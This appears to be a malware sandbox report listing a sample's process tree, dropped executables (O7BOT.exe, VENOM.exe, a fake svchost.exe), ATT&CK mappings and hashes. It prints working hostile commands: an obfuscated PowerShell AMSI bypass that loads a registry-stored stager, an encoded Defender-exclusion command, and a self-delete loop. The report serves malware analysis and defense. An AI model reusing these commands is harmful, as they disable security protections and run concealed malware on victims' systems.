  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fVjeGPErpgVv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JVYfUkcwqLNYRU,[Parameter(Position=1)][Type]$oMOnXtiaGH)$AqxgxKZZJsy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+'e'+''+'m'+''+[Char](111)+''+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+'g'+'a'+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+'S'+'e'+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+'t'+'o'+''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$AqxgxKZZJsy.DefineConstructor('RT'+'S'+'p'+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+'de'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$JVYfUkcwqLNYRU).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'ag'+'e'+''+'d'+'');$AqxgxKZZJsy.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'ok'+'e'+'','P'+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+'H'+'id'+'e'+''+'B'+''+'y'+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+'t,'+'V'+''+[Char](105)+''+'r'+''+'t'+''+'u'+''+'a'+''+[Char](108)+'',$oMOnXtiaGH,$JVYfUkcwqLNYRU).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+'i'+'m'+''+'e'+','+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $AqxgxKZZJsy.CreateType();}$qrrKoveVVgYNz=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+'s'+[Char](111)+''+'f'+''+[Char](116)+'.W'+'i'+''+'n'+'32'+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+'ds');$bMgJunyDaFprmx=$qrrKoveVVgYNz.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+''+'r'+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+'r'+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+'c'+','+'S'+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XKUKLAXQevMzZXRRFjZ=fVjeGPErpgVv @([String])([IntPtr]);$BzOFjbNzRZwjpzhuRhRqKg=fVjeGPErpgVv @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pqqnRaQCsHu=$qrrKoveVVgYNz.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'M'+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+'eH'+'a'+''+'n'+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+'ne'+[Char](108)+''+'3'+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$mrqJhszMMQVXIJ=$bMgJunyDaFprmx.Invoke($Null,@([Object]$pqqnRaQCsHu,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+'L'+''+'i'+''+'b'+''+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+'A'+'')));$OMXTSNMNjmVJJqWjo=$bMgJunyDaFprmx.Invoke($Null,@([Object]$pqqnRaQCsHu,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+'ual'+'P'+''+[Char](114)+''+'o'+'te'+[Char](99)+'t')));$laZgvuH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mrqJhszMMQVXIJ,$XKUKLAXQevMzZXRRFjZ).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$PyJVYxoSeaUbdaftS=$bMgJunyDaFprmx.Invoke($Null,@([Object]$laZgvuH,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'an'+'B'+'u'+[Char](102)+''+'f'+''+[Char](101)+''+'r'+'')));$LUjJyvGEUV=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OMXTSNMNjmVJJqWjo,$BzOFjbNzRZwjpzhuRhRqKg).Invoke($PyJVYxoSeaUbdaftS,[uint32]8,4,[ref]$LUjJyvGEUV);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$PyJVYxoSeaUbdaftS,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OMXTSNMNjmVJJqWjo,$BzOFjbNzRZwjpzhuRhRqKg).Invoke($PyJVYxoSeaUbdaftS,[uint32]8,0x20,[ref]$LUjJyvGEUV);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+'A'+'R'+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+'7s'+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARQB4AGMAZQBwAHQAaQBvAG4AXABUAHkAcABlAEkAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEUAeABjAGUAcAB0AGkAbwBuAFwAVAB5AHAAZQBJAGQALgBlAHgAZQA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1564
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4128
- C:\Users\Admin\AppData\Roaming\Exception\TypeId.exe
  C:\Users\Admin\AppData\Roaming\Exception\TypeId.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1860
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    3⤵
    PID:2200

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1336

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1432
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1580

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1776

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1900

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1940

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1988

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2524

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2560

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2192

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3308

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3420
- C:\Users\Admin\AppData\Local\Temp\9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe
  "C:\Users\Admin\AppData\Local\Temp\9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe"
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4948
- - C:\Users\Admin\AppData\Local\Temp\O7BOT.exe
    "C:\Users\Admin\AppData\Local\Temp\O7BOT.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks processor information in registry
    - Suspicious use of AdjustPrivilegeToken
    PID:2248
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1524
- - C:\Users\Admin\AppData\Local\Temp\VENOM.exe
    "C:\Users\Admin\AppData\Local\Temp\VENOM.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2108
  - - C:\Users\Admin\AppData\Roaming\Install.exe
      "C:\Users\Admin\AppData\Roaming\Install.exe"
      4⤵
      Executes dropped EXE
      PID:3972
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2108 -s 1928
      4⤵
      Program crash
      PID:2660
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $file='C:\Users\Admin\AppData\Local\Temp\9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe';for($i=1;$i -le 600 -and (Test-Path $file -PathType leaf);$i++){Remove-Item $file;Start-Sleep -m 100}
    3⤵
    - Deletes itself
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3560

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3752

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3960

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3844

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4068

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:5096

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4496

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:1612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3920

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3100

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4380

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:1804

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:1204
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2108 -ip 2108
  2⤵
  PID:3620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
ed65c8043643ff30b0d94ce8f5bb2b61

SHA1
302ee09a9cf5eb1b0f16122176e756801ec0efe1

SHA256
a5de1f5d89e186cd381561a311f217ed9dc15d3e1cb01fa92319d658133282f1

SHA512
aa3c8da848940e46046844fe0d37585fa0048305e95c8f12e15031bf9afb350ee82db311e6ff98b5039b0491a28f4cc6f08816cc5c961bb1dd50e994bdd36da3

Download Submit
C:\Users\Admin\AppData\Local\Temp\O7BOT.exe

Filesize
34KB

MD5
15df2c3e654cfcf05a461001caa3873f

SHA1
76755d8f5ca782d87320e031b9b5c1c06c1aa59a

SHA256
def50a99856f6c75d6f714b390da7c98ba82ce0280c101c313cc90caf522f011

SHA512
b871fc427c5760fe4a37aadc8962c72df331d4daf7d8e50bc3cdd51981db3e0abe92429701d2325d7827ae33d5d289ee52020a8ebb4a49629920f13eeb77ab80

Download Submit
C:\Users\Admin\AppData\Local\Temp\VENOM.exe

Filesize
376KB

MD5
6b9c17340172a6a60b1104628a69f9c6

SHA1
db8e387d429b852233dc872b91f7cc9308c703f9

SHA256
9c67f5654d96f6399a567bdd70314b0d746bffa8611591d473217e287a46d14e

SHA512
6b4e475d23892e4ce646b291222793b8f6fa0f888545ddbebb5fd02bd145212911abf15933888021560a5bf912e03e4b0c37a0b03601be25d691e885d7bc09ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0qvdx2hw.wrk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
631KB

MD5
9d82dc826bcac1bdd4c41bf79577af27

SHA1
c38360ef0e8acb8f34ebe713ab83ce85cf3fe503

SHA256
784233bc80ea7857c39dbcd9c929a626093fced8c54224e742c4d0e1d128e80d

SHA512
7b863ee39c0e58e91db4fef3bf968c15a595d8de7dbbfd43d56c8b6e2ccdff59aaedc85cdb5d9924128cdf5fc1a77fe9fe36a4dcc4d8fd49da89b6462be1338b

Download Submit
C:\Users\Admin\AppData\Roaming\Install.exe

Filesize
162KB

MD5
152e3f07bbaf88fb8b097ba05a60df6e

SHA1
c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

SHA256
a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

SHA512
2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Download Submit
memory/60-298-0x000001CADFBD0000-0x000001CADFBFB000-memory.dmp

Filesize
172KB

Download
memory/60-304-0x000001CADFBD0000-0x000001CADFBFB000-memory.dmp

Filesize
172KB

Download
memory/60-305-0x00007FFB811F0000-0x00007FFB81200000-memory.dmp

Filesize
64KB

Download
memory/448-309-0x00000233346E0000-0x000002333470B000-memory.dmp

Filesize
172KB

Download
memory/616-264-0x0000015A83080000-0x0000015A830AB000-memory.dmp

Filesize
172KB

Download
memory/616-263-0x0000015A83050000-0x0000015A83075000-memory.dmp

Filesize
148KB

Download
memory/616-271-0x0000015A83080000-0x0000015A830AB000-memory.dmp

Filesize
172KB

Download
memory/616-272-0x00007FFB811F0000-0x00007FFB81200000-memory.dmp

Filesize
64KB

Download
memory/616-265-0x0000015A83080000-0x0000015A830AB000-memory.dmp

Filesize
172KB

Download
memory/668-283-0x00007FFB811F0000-0x00007FFB81200000-memory.dmp

Filesize
64KB

Download
memory/668-282-0x000001AF45F20000-0x000001AF45F4B000-memory.dmp

Filesize
172KB

Download
memory/668-276-0x000001AF45F20000-0x000001AF45F4B000-memory.dmp

Filesize
172KB

Download
memory/956-287-0x0000023F92440000-0x0000023F9246B000-memory.dmp

Filesize
172KB

Download
memory/956-293-0x0000023F92440000-0x0000023F9246B000-memory.dmp

Filesize
172KB

Download
memory/956-294-0x00007FFB811F0000-0x00007FFB81200000-memory.dmp

Filesize
64KB

Download
memory/1524-171-0x000001CEC7460000-0x000001CEC7562000-memory.dmp

Filesize
1.0MB

Download
memory/1524-186-0x000001CEC7800000-0x000001CEC784C000-memory.dmp

Filesize
304KB

Download
memory/1524-123-0x000001CEACE40000-0x000001CEACEE2000-memory.dmp

Filesize
648KB

Download
memory/1524-185-0x000001CEC7560000-0x000001CEC75B6000-memory.dmp

Filesize
344KB

Download
memory/1524-230-0x000001CEC7850000-0x000001CEC78A4000-memory.dmp

Filesize
336KB

Download
memory/1524-980-0x00007FFBA3160000-0x00007FFBA3C21000-memory.dmp

Filesize
10.8MB

Download
memory/1524-182-0x00007FFBA3160000-0x00007FFBA3C21000-memory.dmp

Filesize
10.8MB

Download
memory/1860-994-0x0000025EE82C0000-0x0000025EE8362000-memory.dmp

Filesize
648KB

Download
memory/2108-223-0x0000000005AA0000-0x0000000005AB6000-memory.dmp

Filesize
88KB

Download
memory/2108-184-0x0000000000200000-0x0000000000264000-memory.dmp

Filesize
400KB

Download
memory/2108-189-0x0000000000AE0000-0x0000000000B22000-memory.dmp

Filesize
264KB

Download
memory/2108-191-0x0000000005010000-0x00000000055B4000-memory.dmp

Filesize
5.6MB

Download
memory/2248-74-0x00000000009A0000-0x00000000009AE000-memory.dmp

Filesize
56KB

Download
memory/2248-62-0x00007FFBA3163000-0x00007FFBA3165000-memory.dmp

Filesize
8KB

Download
memory/3116-247-0x0000011BD9620000-0x0000011BD964A000-memory.dmp

Filesize
168KB

Download
memory/3116-249-0x00007FFBBF900000-0x00007FFBBF9BE000-memory.dmp

Filesize
760KB

Download
memory/3116-239-0x0000011BD9290000-0x0000011BD92B2000-memory.dmp

Filesize
136KB

Download
memory/3116-248-0x00007FFBC1170000-0x00007FFBC1365000-memory.dmp

Filesize
2.0MB

Download
memory/3240-252-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3240-257-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3240-260-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3240-251-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3240-253-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3240-259-0x00007FFBBF900000-0x00007FFBBF9BE000-memory.dmp

Filesize
760KB

Download
memory/3240-250-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3240-258-0x00007FFBC1170000-0x00007FFBC1365000-memory.dmp

Filesize
2.0MB

Download
memory/3336-233-0x0000000006B00000-0x0000000006B1A000-memory.dmp

Filesize
104KB

Download
memory/3336-244-0x00000000088B0000-0x0000000008F2A000-memory.dmp

Filesize
6.5MB

Download
memory/3336-238-0x0000000006B70000-0x0000000006B92000-memory.dmp

Filesize
136KB

Download
memory/3336-231-0x00000000075E0000-0x0000000007676000-memory.dmp

Filesize
600KB

Download
memory/3336-227-0x00000000066A0000-0x00000000066EC000-memory.dmp

Filesize
304KB

Download
memory/3336-226-0x0000000006610000-0x000000000662E000-memory.dmp

Filesize
120KB

Download
memory/3336-201-0x0000000006010000-0x0000000006364000-memory.dmp

Filesize
3.3MB

Download
memory/3336-192-0x0000000005F30000-0x0000000005F96000-memory.dmp

Filesize
408KB

Download
memory/3336-195-0x0000000005FA0000-0x0000000006006000-memory.dmp

Filesize
408KB

Download
memory/3336-190-0x0000000005740000-0x0000000005762000-memory.dmp

Filesize
136KB

Download
memory/3336-188-0x00000000057D0000-0x0000000005DF8000-memory.dmp

Filesize
6.2MB

Download
memory/3336-187-0x0000000002D00000-0x0000000002D36000-memory.dmp

Filesize
216KB

Download
memory/4948-0-0x0000000000400000-0x000000000058C000-memory.dmp

Filesize
1.5MB

Download